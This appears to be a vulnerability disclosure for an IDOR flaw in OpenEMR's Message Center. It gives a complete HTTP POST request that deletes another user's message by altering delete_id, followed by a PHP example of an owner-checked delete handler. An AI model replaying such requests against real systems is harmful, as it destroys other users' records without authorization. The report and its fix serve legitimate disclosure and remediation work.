I observed that users can delete messages in other users' Message Center by changing the delete_id parameter to the delete_id value of a message that belongs to another user.
POST /openemr/interface/main/messages/messages.php?showall=&sortby=pnotes.date&sortorder=desc&begin=0&form_active=1 HTTP/1.1
Host: demo.openemr.io
Content-Length: 29
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://demo.openemr.io
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://demo.openemr.io/openemr/interface/main/messages/messages.php?form_active=1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: OpenEMR=F%2CirXOlXHBMtyJUilGMZ0%2C9PvCyhZXGdzItmkF7g5BnT8pyP
Connection: close

task=delete&delete_id%5B%5D=7
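
One way to close this, as an added example that is not OpenEMR's code: the delete handler checks each requested id against the owner recorded server-side for the logged-in session. The in-memory store, the function names and the users alice and bob are assumptions made for illustration.

```php
<?php
// Added example: hypothetical in-memory store, not OpenEMR's code.
// Constructed sample data: message id => owner and body.
$messages = [
    7 => ['owner' => 'alice', 'body' => 'Lab results ready'],
    8 => ['owner' => 'bob',   'body' => 'Call patient back'],
];

// Before: deletes whatever ids the request names, as in the report above.
function deleteUnchecked(array &$store, array $ids): array
{
    $deleted = [];
    foreach ($ids as $id) {
        $id = (int) $id;
        if (isset($store[$id])) {
            unset($store[$id]);
            $deleted[] = $id;
        }
    }
    return $deleted;
}

// After: the owner is taken from the server-side session, never from the request.
// Unknown ids and other users' ids are refused identically, so the response
// does not reveal which message ids exist.
function deleteOwned(array &$store, array $ids, string $sessionUser): array
{
    $result = ['deleted' => [], 'denied' => []];
    foreach ($ids as $id) {
        $id = (int) $id;
        if (isset($store[$id]) && $store[$id]['owner'] === $sessionUser) {
            unset($store[$id]);
            $result['deleted'][] = $id;
        } else {
            $result['denied'][] = $id;
        }
    }
    return $result;
}

// The request body from the report, sent in a session belonging to bob.
parse_str('task=delete&delete_id%5B%5D=7', $post);
$ids = (array) ($post['delete_id'] ?? []);

$before = $messages; // copy handled by the unchecked version
$after  = $messages; // copy handled by the owner-checked version
echo json_encode(deleteUnchecked($before, $ids)), "\n";
echo json_encode(deleteOwned($after, $ids, 'bob')), "\n";
echo json_encode(array_keys($after)), "\n";
```

With a SQL-backed store the same condition belongs in the DELETE statement's WHERE clause, bound to the session user, so the check and the delete happen in one step.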